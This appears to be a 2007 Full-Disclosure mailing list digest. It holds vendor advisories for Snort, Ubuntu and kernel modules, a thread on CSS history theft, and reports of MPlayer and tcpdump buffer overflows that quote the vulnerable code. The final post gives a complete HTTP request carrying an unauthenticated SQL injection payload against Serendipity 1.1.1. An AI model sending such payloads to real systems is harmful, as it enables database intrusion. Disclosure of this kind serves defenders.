From security at mandriva.com Thu Mar 1 01:39:14 2007 From: security at mandriva.com (security at mandriva.com) Date: Wed, 28 Feb 2007 18:39:14 -0700 Subject: [Full-disclosure] [ MDKSA-2007:051 ] - Updated snort packages fix DoS vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2007:051 http://www.mandriva.com/security/ _______________________________________________________________________ Package : snort Date : February 28, 2007 Affected: 2006.0, 2007.0, Corporate 4.0, Multi Network Firewall 2.0 _______________________________________________________________________ Problem Description: Algorithmic complexity vulnerability in Snort before 2.6.1, during predicate evaluation in rule matching for certain rules, allows remote attackers to cause a denial of service (CPU consumption and detection outage) via crafted network traffic, aka a backtracking attack. Updated packages have been patched to address this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6931 _______________________________________________________________________ Updated Packages: Mandriva Linux 2006.0: 14acfc4ab91f55172378ee21783086d0 2006.0/i586/snort-2.3.3-2.3.20060mdk.i586.rpm 47737c1cffe59207c0e0117a96ebbd5e 2006.0/i586/snort-bloat-2.3.3-2.3.20060mdk.i586.rpm 94cef69c4f82524583b93b00ca1885e4 2006.0/i586/snort-inline+flexresp-2.3.3-2.3.20060mdk.i586.rpm 5c5cb3205151f9378ff26775899cf92a 2006.0/i586/snort-inline-2.3.3-2.3.20060mdk.i586.rpm a81892910c6a3b0217c54295cd96f250 2006.0/i586/snort-mysql+flexresp-2.3.3-2.3.20060mdk.i586.rpm 9fa2f3f800217ca6ee8f4a68087d653e 2006.0/i586/snort-mysql-2.3.3-2.3.20060mdk.i586.rpm 28ccfe41c7319de41fe264d9dcab936f 2006.0/i586/snort-plain+flexresp-2.3.3-2.3.20060mdk.i586.rpm 944a116617108b81acdcc69857ef2a72 2006.0/i586/snort-postgresql+flexresp-2.3.3-2.3.20060mdk.i586.rpm bc5c0ae549924afc4b764849f9ef2188 2006.0/i586/snort-postgresql-2.3.3-2.3.20060mdk.i586.rpm f1af2f22a2cb9842b07126e2a97c3b39 2006.0/i586/snort-snmp+flexresp-2.3.3-2.3.20060mdk.i586.rpm 78050d7070f70f456d6813767f172a46 2006.0/i586/snort-snmp-2.3.3-2.3.20060mdk.i586.rpm 469ee540ffd3ddaff34d6d9e44a526bd 2006.0/SRPMS/snort-2.3.3-2.3.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 68080ccee02d86e20f249f17f7d32df1 2006.0/x86_64/snort-2.3.3-2.3.20060mdk.x86_64.rpm 6c78769ad7344e3c5df82f705bb2c44a 2006.0/x86_64/snort-bloat-2.3.3-2.3.20060mdk.x86_64.rpm 77d9a51dbaefc07556dfd04bcc785dcf 2006.0/x86_64/snort-inline+flexresp-2.3.3-2.3.20060mdk.x86_64.rpm 0b072085f8558dc53f22a64933ee715f 2006.0/x86_64/snort-inline-2.3.3-2.3.20060mdk.x86_64.rpm 6285f03ba66610c0da8eeb096c5e0e6f 2006.0/x86_64/snort-mysql+flexresp-2.3.3-2.3.20060mdk.x86_64.rpm 07657701d906c8873c089d2714e60333 2006.0/x86_64/snort-mysql-2.3.3-2.3.20060mdk.x86_64.rpm 950579ea3634f96a34f2df17fab8714b 2006.0/x86_64/snort-plain+flexresp-2.3.3-2.3.20060mdk.x86_64.rpm f20d48e02803dadea7a4c6a85917d501 2006.0/x86_64/snort-postgresql+flexresp-2.3.3-2.3.20060mdk.x86_64.rpm 5db998f1482ec1318938f91cbb1af30f 2006.0/x86_64/snort-postgresql-2.3.3-2.3.20060mdk.x86_64.rpm 056096e5c2e6766814f2bac64f95f596 2006.0/x86_64/snort-snmp+flexresp-2.3.3-2.3.20060mdk.x86_64.rpm 50fcc13df4589baab5c3a92e5f8c831a 2006.0/x86_64/snort-snmp-2.3.3-2.3.20060mdk.x86_64.rpm 469ee540ffd3ddaff34d6d9e44a526bd 2006.0/SRPMS/snort-2.3.3-2.3.20060mdk.src.rpm Mandriva Linux 2007.0: d29012178cfaf0b37e6b7a76e0b66660 2007.0/i586/snort-2.6.0-3.1mdv2007.0.i586.rpm 897c2c44ec92bf21f6b9726b4f938ab0 2007.0/i586/snort-bloat-2.6.0-3.1mdv2007.0.i586.rpm 822a146097d3d78032a926005417d2eb 2007.0/i586/snort-inline+flexresp-2.6.0-3.1mdv2007.0.i586.rpm ec191df50521f8d93d3d033d8c3aa2d9 2007.0/i586/snort-inline-2.6.0-3.1mdv2007.0.i586.rpm cc7f1773fb2fb17c79ba4c0867435918 2007.0/i586/snort-mysql+flexresp-2.6.0-3.1mdv2007.0.i586.rpm aaa7876ca72b1effe2d0c851a28d1cc2 2007.0/i586/snort-mysql-2.6.0-3.1mdv2007.0.i586.rpm 47f56100d7aa5d5ddcb414212711e942 2007.0/i586/snort-plain+flexresp-2.6.0-3.1mdv2007.0.i586.rpm 3031d24bfbeb9fa5539fea8e42047c21 2007.0/i586/snort-postgresql+flexresp-2.6.0-3.1mdv2007.0.i586.rpm ec7cf5d51dec733e40e37accc46da547 2007.0/i586/snort-postgresql-2.6.0-3.1mdv2007.0.i586.rpm 9d19e856ecfc5f51a40bb11214fda23d 2007.0/i586/snort-prelude+flexresp-2.6.0-3.1mdv2007.0.i586.rpm c63840f49d3b6a890c17bd7a6e5b45ec 2007.0/i586/snort-prelude-2.6.0-3.1mdv2007.0.i586.rpm 41c885cd6a29670f73505f357e7df534 2007.0/SRPMS/snort-2.6.0-3.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: b608bd9b32cba92b9fc4b0df3cea10d0 2007.0/x86_64/snort-2.6.0-3.1mdv2007.0.x86_64.rpm 477a76ade1a59db6a4e899bd1abd3219 2007.0/x86_64/snort-bloat-2.6.0-3.1mdv2007.0.x86_64.rpm 1040562c56a5f1f651d4fcb520b71401 2007.0/x86_64/snort-inline+flexresp-2.6.0-3.1mdv2007.0.x86_64.rpm 3c935cf98ea807fb955b4467786dc6d5 2007.0/x86_64/snort-inline-2.6.0-3.1mdv2007.0.x86_64.rpm a72f85b6949a00e4d0c125a57274048d 2007.0/x86_64/snort-mysql+flexresp-2.6.0-3.1mdv2007.0.x86_64.rpm f815afc9ce1aeb351782e615fbdf7c22 2007.0/x86_64/snort-mysql-2.6.0-3.1mdv2007.0.x86_64.rpm 26046610206df4cff8508549be74a144 2007.0/x86_64/snort-plain+flexresp-2.6.0-3.1mdv2007.0.x86_64.rpm 028d7074b920d331685d2599ae0d5fa7 2007.0/x86_64/snort-postgresql+flexresp-2.6.0-3.1mdv2007.0.x86_64.rpm 7aab39105369c185c70064836b1b81fd 2007.0/x86_64/snort-postgresql-2.6.0-3.1mdv2007.0.x86_64.rpm 98b2c4ee272001a08fbcb7b9ec6b06ac 2007.0/x86_64/snort-prelude+flexresp-2.6.0-3.1mdv2007.0.x86_64.rpm 93fb2d5603d8b905f713057fb2f602e6 2007.0/x86_64/snort-prelude-2.6.0-3.1mdv2007.0.x86_64.rpm 41c885cd6a29670f73505f357e7df534 2007.0/SRPMS/snort-2.6.0-3.1mdv2007.0.src.rpm Corporate 4.0: acca1849a4344ba21bdd025b4b5df546 corporate/4.0/i586/snort-2.4.5-1.2.20060mlcs4.i586.rpm 3f0f252ce90cb549389566b1b9fa30e5 corporate/4.0/i586/snort-bloat-2.4.5-1.2.20060mlcs4.i586.rpm d1332509d105dc88b52973b0bad0b39e corporate/4.0/i586/snort-inline+flexresp-2.4.5-1.2.20060mlcs4.i586.rpm 0ebd8d99f49c643336b27317a007f508 corporate/4.0/i586/snort-inline-2.4.5-1.2.20060mlcs4.i586.rpm c3780982acdf477a815653f3cd196592 corporate/4.0/i586/snort-mysql+flexresp-2.4.5-1.2.20060mlcs4.i586.rpm 165ededf0f837a9ab8d199060ec2f419 corporate/4.0/i586/snort-mysql-2.4.5-1.2.20060mlcs4.i586.rpm a8c043893fddd62c031db00562913449 corporate/4.0/i586/snort-plain+flexresp-2.4.5-1.2.20060mlcs4.i586.rpm 2576dae48c7cdcda07663d9b0076ed3a corporate/4.0/i586/snort-postgresql+flexresp-2.4.5-1.2.20060mlcs4.i586.rpm f2aa1b11e34668f7ed266355e81edf61 corporate/4.0/i586/snort-postgresql-2.4.5-1.2.20060mlcs4.i586.rpm 092bf95d2d46e7dda7129df5b35f3226 corporate/4.0/i586/snort-prelude+flexresp-2.4.5-1.2.20060mlcs4.i586.rpm 60deea47ecbe39fa132a33895c68585b corporate/4.0/i586/snort-prelude-2.4.5-1.2.20060mlcs4.i586.rpm 12375f9cbbdf27bfc481dbcc05d9fde0 corporate/4.0/i586/snort-snmp+flexresp-2.4.5-1.2.20060mlcs4.i586.rpm e74f10ad5826db12ca0769cf9e0c44cb corporate/4.0/i586/snort-snmp-2.4.5-1.2.20060mlcs4.i586.rpm 56600d329f0d35d1f168344bd35f70b5 corporate/4.0/SRPMS/snort-2.4.5-1.2.20060mlcs4.src.rpm Corporate 4.0/X86_64: 1cd573fdc6615ca639e38ba934922076 corporate/4.0/x86_64/snort-2.4.5-1.2.20060mlcs4.x86_64.rpm a5f21846da335073bc9220fc58fb1d6c corporate/4.0/x86_64/snort-bloat-2.4.5-1.2.20060mlcs4.x86_64.rpm 5d806ad68f4e3fd1d0e5982312a38ab3 corporate/4.0/x86_64/snort-inline+flexresp-2.4.5-1.2.20060mlcs4.x86_64.rpm df3a160e22d584e94a174d8770c23147 corporate/4.0/x86_64/snort-inline-2.4.5-1.2.20060mlcs4.x86_64.rpm d40e9420d7c66cb1fd8e249e6e0eb540 corporate/4.0/x86_64/snort-mysql+flexresp-2.4.5-1.2.20060mlcs4.x86_64.rpm bf85d4875568b7f0730b0a066925b722 corporate/4.0/x86_64/snort-mysql-2.4.5-1.2.20060mlcs4.x86_64.rpm 6b067b67405af248a7bfd5e2d551f18b corporate/4.0/x86_64/snort-plain+flexresp-2.4.5-1.2.20060mlcs4.x86_64.rpm 2de696b63b04481d443e9a85e6d6f655 corporate/4.0/x86_64/snort-postgresql+flexresp-2.4.5-1.2.20060mlcs4.x86_64.rpm c10f29fa0e3077f3d89cb3d707c02a5a corporate/4.0/x86_64/snort-postgresql-2.4.5-1.2.20060mlcs4.x86_64.rpm a4e6929e593ed1445b060b1f6e244ab2 corporate/4.0/x86_64/snort-prelude+flexresp-2.4.5-1.2.20060mlcs4.x86_64.rpm 9b90c281dae9b4f14358d7c35b05c98c corporate/4.0/x86_64/snort-prelude-2.4.5-1.2.20060mlcs4.x86_64.rpm 75ffa4a4e0671bad4f4a6548fea5cd51 corporate/4.0/x86_64/snort-snmp+flexresp-2.4.5-1.2.20060mlcs4.x86_64.rpm 22a7a07d459a48f4cf430bfaf96ccbd9 corporate/4.0/x86_64/snort-snmp-2.4.5-1.2.20060mlcs4.x86_64.rpm 56600d329f0d35d1f168344bd35f70b5 corporate/4.0/SRPMS/snort-2.4.5-1.2.20060mlcs4.src.rpm Multi Network Firewall 2.0: 587839951c01cdf69b2a60ada22db0a0 mnf/2.0/i586/snort-2.1.0-3.1.M20mdk.i586.rpm aee651ef150ac9c9c82626c86e146e81 mnf/2.0/i586/snort-bloat-2.1.0-3.1.M20mdk.i586.rpm 3a54884ee7391077b16e6693683433a7 mnf/2.0/i586/snort-mysql+flexresp-2.1.0-3.1.M20mdk.i586.rpm a6eb3b2df3e971e3d541932c151e2adc mnf/2.0/i586/snort-mysql-2.1.0-3.1.M20mdk.i586.rpm d18a9444b54d7c6edc303ef63e18a9f0 mnf/2.0/i586/snort-plain+flexresp-2.1.0-3.1.M20mdk.i586.rpm 5dba5abf07bd3e08bb53996d1de3b13e mnf/2.0/i586/snort-postgresql+flexresp-2.1.0-3.1.M20mdk.i586.rpm 39f461b7a95df268c4a30f47db064acb mnf/2.0/i586/snort-postgresql-2.1.0-3.1.M20mdk.i586.rpm cb0bcfa2730d36e9d3d2e4af4be3ebd4 mnf/2.0/i586/snort-snmp+flexresp-2.1.0-3.1.M20mdk.i586.rpm c07a848d0d6f92fc978708ab8fc5a725 mnf/2.0/i586/snort-snmp-2.1.0-3.1.M20mdk.i586.rpm 05d54ef33e34c2a30e164fa963eec903 mnf/2.0/SRPMS/snort-2.1.0-3.1.M20mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF5gMMmqjQ0CJFipgRAvvdAKDx62tqnBrWO/W1lxil2ia31zt5RgCePbr0 n1JAWq7D0mAn0SuTFRfLjgI= =nDNz -----END PGP SIGNATURE----- From matthew.flaschen at gatech.edu Thu Mar 1 08:09:18 2007 From: matthew.flaschen at gatech.edu (Matthew Flaschen) Date: Thu, 01 Mar 2007 03:09:18 -0500 Subject: [Full-disclosure] Stealing Browser History Without Using JavaScript In-Reply-To: References: <6905b1570702280843h2d29b8ddl5b5efe065b62a8a2@mail.gmail.com> Message-ID: <45E68A2E.7030309@gatech.edu> RSnake wrote: > In case anyone is interested, I was able to port the old CSS > history hacking stuff that Jeremiah Grossman originally found to a > version that does not require JavaScript to fire using images and > conditional logic built into CSS using a:visited and display attributes. > It works in both IE7.0 and Firefox 2.0.0.2. Details at the link below: > > http://ha.ckers.org/blog/20070228/steal-browser-history-without-javascript/ "We all know there are still people out there who think turning off JavaScript protects them from everything." Damn it... Good job. I guess NoScript isn't good enough anymore... Matt Flaschen -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 254 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070301/2a71eced/attachment.bin From martin.pitt at canonical.com Thu Mar 1 08:59:26 2007 From: martin.pitt at canonical.com (Martin Pitt) Date: Thu, 1 Mar 2007 09:59:26 +0100 Subject: [Full-disclosure] [USN-416-2] nvidia-glx-config regression Message-ID: <20070301085926.GF5529@piware.de> =========================================================== Ubuntu Security Notice USN-416-2 March 01, 2007 linux-restricted-modules-2.6.17 regression https://launchpad.net/bugs/66908 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.10: nvidia-glx 2.6.17.7-11.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: USN-416-1 fixed various vulnerabilities in the Linux kernel. Unfortunately that update caused the 'nvidia-glx-config' script to not work any more. The new version fixes the problem. We apologize for the inconvenience. Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-2.6.17_2.6.17.7-11.2.diff.gz Size/MD5: 89152 772068f013e18c8cd3bee371194fe2f5 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-2.6.17_2.6.17.7-11.2.dsc Size/MD5: 2615 9da8b0a95647984a06ba93267b9e303b http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-2.6.17_2.6.17.7.orig.tar.gz Size/MD5: 94289230 283efe66f46b478dea207dac92b7e4e2 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-common_2.6.17.7-11.2_all.deb Size/MD5: 20236 6b55a402fa0930b7e8bb1c16aece8a30 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/avm-fritz-firmware-2.6.17-11_3.11+2.6.17.7-11.2_amd64.deb Size/MD5: 476830 0e741afd28ff59f6abdc931b67282dec http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/avm-fritz-kernel-source_3.11+2.6.17.7-11.2_amd64.deb Size/MD5: 2130084 09090d30b6bcb16259d0344b5a852e1a http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/fglrx-control_8.28.8+2.6.17.7-11.2_amd64.deb Size/MD5: 77616 34b12bc805e4c89b01feb00680ffc62e http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/fglrx-kernel-source_8.28.8+2.6.17.7-11.2_amd64.deb Size/MD5: 547560 73ce80f54e6fdb6285601844b4ea5a0a http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-2.6.17-11-generic_2.6.17.7-11.2_amd64.deb Size/MD5: 6652424 62054b3b0326325683edda4581d0a098 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/nic-restricted-firmware-2.6.17-11-generic-di_2.6.17.7-11.2_amd64.udeb Size/MD5: 965680 83868530e04da7ea8d665fff5704273b http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/nic-restricted-modules-2.6.17-11-generic-di_2.6.17.7-11.2_amd64.udeb Size/MD5: 319162 df364edff08fd7a853c9859813c0bd16 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/nvidia-glx-dev_1.0.8776+2.6.17.7-11.2_amd64.deb Size/MD5: 168544 d39fdccbc31828b7e77323645c6c52c6 http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/nvidia-glx-legacy-dev_1.0.7184+2.6.17.7-11.2_amd64.deb Size/MD5: 162460 3bdec676c86c1702905fc2fdf5067c8b http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/nvidia-glx-legacy_1.0.7184+2.6.17.7-11.2_amd64.deb Size/MD5: 6082324 342748fc5510ee9aec287c1c123ae527 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/nvidia-glx_1.0.8776+2.6.17.7-11.2_amd64.deb Size/MD5: 7330700 95697ebe21eaac11ece6ae68e2ac280d http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/nvidia-kernel-source_1.0.8776+2.6.17.7-11.2_amd64.deb Size/MD5: 1755654 d206422ea23adf9594f9a116a1b098d1 http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/nvidia-legacy-kernel-source_1.0.7184+2.6.17.7-11.2_amd64.deb Size/MD5: 1383588 fcf770d04fda771f5fb6329c20fe6c08 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/vmware-player-kernel-modules-2.6.17-11_2.6.17.7-11.2_amd64.deb Size/MD5: 94200 d4eac639b80fe17067e299e7c02cb7dd http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/xorg-driver-fglrx-dev_7.1.0-8.28.8+2.6.17.7-11.2_amd64.deb Size/MD5: 133606 fdf47226d7ee7382f4d59d0f97284752 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/xorg-driver-fglrx_7.1.0-8.28.8+2.6.17.7-11.2_amd64.deb Size/MD5: 16016920 f098db02f04188a4be6fe317a433d9ca i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/avm-fritz-firmware-2.6.17-11_3.11+2.6.17.7-11.2_i386.deb Size/MD5: 1206380 ac327f27520eec83a2e27b80b195e692 http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/avm-fritz-kernel-source_3.11+2.6.17.7-11.2_i386.deb Size/MD5: 3426938 4a3ae2b8fc1fbb00e83a6bc1e135be00 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/fglrx-control_8.28.8+2.6.17.7-11.2_i386.deb Size/MD5: 74932 2c62b5bd45d2858a3e34876b81d00f17 http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/fglrx-kernel-source_8.28.8+2.6.17.7-11.2_i386.deb Size/MD5: 701890 acf617420e630b8658dc840ea735ce47 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-2.6.17-11-386_2.6.17.7-11.2_i386.deb Size/MD5: 7886528 88d137b8384971a107f1c5ab0c45b259 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-2.6.17-11-generic_2.6.17.7-11.2_i386.deb Size/MD5: 7681916 cf3e8caa2f28c46fd1e3dc5d4ce3a1b8 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/nic-restricted-firmware-2.6.17-11-386-di_2.6.17.7-11.2_i386.udeb Size/MD5: 965578 baca90ec52297ab161a2e436fc47420a http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/nic-restricted-modules-2.6.17-11-386-di_2.6.17.7-11.2_i386.udeb Size/MD5: 292852 a57af94e858ce70c9cef0085aff63f99 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/nvidia-glx-dev_1.0.8776+2.6.17.7-11.2_i386.deb Size/MD5: 149334 896b0fd94231187c906f3bf0f43a5a42 http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/nvidia-glx-legacy-dev_1.0.7184+2.6.17.7-11.2_i386.deb Size/MD5: 141534 c834ce2e34d39c890616227a48c165bc http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/nvidia-glx-legacy_1.0.7184+2.6.17.7-11.2_i386.deb Size/MD5: 3070512 2c3a44c8fda68f26484ae2bfbc00acd6 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/nvidia-glx_1.0.8776+2.6.17.7-11.2_i386.deb Size/MD5: 4066354 a05ebe78d92259f20f02349a3c58d0ff http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/nvidia-kernel-source_1.0.8776+2.6.17.7-11.2_i386.deb Size/MD5: 1695566 8ba82743eb1ae5e85d92565039218047 http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/nvidia-legacy-kernel-source_1.0.7184+2.6.17.7-11.2_i386.deb Size/MD5: 1374622 246ca56d5ced2791d7f93476bb6a8fbd http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/vmware-player-kernel-modules-2.6.17-11_2.6.17.7-11.2_i386.deb Size/MD5: 140774 5e926b0db2b94486fb91bed612c415f4 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/xorg-driver-fglrx-dev_7.1.0-8.28.8+2.6.17.7-11.2_i386.deb Size/MD5: 117654 7530bbe400b0076a60412d39269a41d9 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/xorg-driver-fglrx_7.1.0-8.28.8+2.6.17.7-11.2_i386.deb Size/MD5: 9402352 6a400a29d7dd1bcad6c11699a2019f9f powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-2.6.17-11-powerpc-smp_2.6.17.7-11.2_powerpc.deb Size/MD5: 1285168 6910af095b64409b1b8cc52a02a06c7d http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-2.6.17-11-powerpc64-smp_2.6.17.7-11.2_powerpc.deb Size/MD5: 996538 f8eced58f2639267cb79f9fe93efdda6 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-2.6.17-11-powerpc_2.6.17.7-11.2_powerpc.deb Size/MD5: 1282820 ff15b6f3bf85033b82f6f4568416fc38 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/nic-restricted-firmware-2.6.17-11-powerpc-di_2.6.17.7-11.2_powerpc.udeb Size/MD5: 965666 a81bb2a0dc7b79814bc7ac16f90f9f61 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/nic-restricted-modules-2.6.17-11-powerpc-di_2.6.17.7-11.2_powerpc.udeb Size/MD5: 287196 1d9f7bc395068e1f1ce14d8f357b4705 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-2.6.17-11-sparc64-smp_2.6.17.7-11.2_sparc.deb Size/MD5: 996508 567181402aeb05c1accbeada9f0bf99b http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-2.6.17-11-sparc64_2.6.17.7-11.2_sparc.deb Size/MD5: 996420 6d8c1f804d88990f158cf2d1240cf1b7 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070301/1bea58c7/attachment.bin From moritz at jodeit.org Thu Mar 1 12:08:45 2007 From: moritz at jodeit.org (Moritz Jodeit) Date: Thu, 1 Mar 2007 13:08:45 +0100 Subject: [Full-disclosure] MPlayer DMO buffer overflow Message-ID: <20070301120845.GA16@fugu1.local> There's an exploitable buffer overflow in the current version of MPlayer (v1.0rc1) which can be exploited with a maliciously crafted video file. It's hidden in the function DMO_VideoDecoder() in the file loader/dmo/DMO_VideoDecoder.c. The variable format->biSize gets its value directly from the video file, and thus can have any value up to LONG_MAX. In line 136 it is used without any further checks as the length argument to the memcpy() call, which can overflow the this->m_sVhdr->bmiHeader buffer with data directly from the video file. 117 unsigned int bihs; 118 119 bihs = (format->biSize < (int) sizeof(BITMAPINFOHEADER)) ? 120 sizeof(BITMAPINFOHEADER) : format->biSize; 121 122 this->iv.m_bh = malloc(bihs); 123 memcpy(this->iv.m_bh, format, bihs); 124 125 this->iv.m_State = STOP; 126 //this->iv.m_pFrame = 0; 127 this->iv.m_Mode = DIRECT; 128 this->iv.m_iDecpos = 0; 129 this->iv.m_iPlaypos = -1; 130 this->iv.m_fQuality = 0.0f; 131 this->iv.m_bCapable16b = true; 132 133 bihs += sizeof(VIDEOINFOHEADER) - sizeof(BITMAPINFOHEADER); 134 this->m_sVhdr = malloc(bihs); 135 memset(this->m_sVhdr, 0, bihs); 136 memcpy(&this->m_sVhdr->bmiHeader, this->iv.m_bh, this->iv.m_bh->biSize); This got fixed [1] in trunk two weeks ago. [1] http://svn.mplayerhq.hu/mplayer/trunk/loader/dmo/DMO_VideoDecoder.c?r1=22019&r2=22204 Best, Moritz Jodeit From moritz at jodeit.org Thu Mar 1 12:59:23 2007 From: moritz at jodeit.org (Moritz Jodeit) Date: Thu, 1 Mar 2007 13:59:23 +0100 Subject: [Full-disclosure] tcpdump: off-by-one heap overflow in 802.11 printer Message-ID: <20070301125923.GA10682@fugu1.local> There's an off-by-one heap-overflow in the ieee802.11 printer, which can be triggered by a maliciously crafted 802.11 frame. The link type must have been explicitly specified for this to work. The function parse_elements() in print-802_11.c checks the length pbody->tim.length from the frame for too small values in line 265, but then uses the wrong variable in the following range check in line 267. Since pbody->tim.length is defined as a u_int8_t it can hold a maximum value of 255, which in turn would copy 252 bytes into pbody->tim.bitmap, which is only 251 bytes of size. 253 case E_TIM: 254 /* Present, possibly truncated */ 255 pbody->tim_status = TRUNCATED; 256 if (!TTEST2(*(p + offset), 2)) 257 return; 258 memcpy(&pbody->tim, p + offset, 2); 259 offset += 2; 260 if (!TTEST2(*(p + offset), 3)) 261 return; 262 memcpy(&pbody->tim.count, p + offset, 3); 263 offset += 3; 264 265 if (pbody->tim.length <= 3) 266 break; 267 if (pbody->rates.length > sizeof pbody->tim.bitmap) 268 return; 269 if (!TTEST2(*(p + offset), pbody->tim.length - 3)) 270 return; 271 memcpy(pbody->tim.bitmap, p + (pbody->tim.length - 3), 272 (pbody->tim.length - 3)) The current tcpdump release 3.9.5 is still vulnerable. This got fixed [1] in CVS Head and in the tcpdump_3_9 branch. [1] http://cvs.tcpdump.org/cgi-bin/cvsweb/tcpdump/print-802_11.c?r1=1.42&r2=1.43 Best, Moritz Jodeit From samuschie at yahoo.de Thu Mar 1 16:55:13 2007 From: samuschie at yahoo.de (SaMuschie) Date: Thu, 1 Mar 2007 17:55:13 +0100 (CET) Subject: [Full-disclosure] Serendipity unauthenticated SQL-Injection Message-ID: <20070301165513.66851.qmail@web27807.mail.ukl.yahoo.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 +--------------------------------------- - -- - | SaMuschie Research Labs proudly presents . . . +------------------------------------------- -- - - | Application: serendipity | Version: 1.1.1 (others not testet) | Vuln./Exploit Type: SQL-Injection | Status: 0day +----------------------------------------- -- - - | Discovered by: Samenspender | Released: 20070301 | SaMuschie Release Number: 4 +------------------------------- - -- - POST /serendipity/index.php?frontpage HTTP/1.0 User-Agent: Mozilla/5.0 (SaMuschie) Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Content-Type: application/x-www-form-urlencoded Content-Length: 67 Connection: close serendipity%5BmultiCat%5D%5B%5D='&serendipity%5BisMultiCat%5D=Go%21 +----------------------------- -- - | Lameness Disclaimer +------------------------------------- - -- - - | 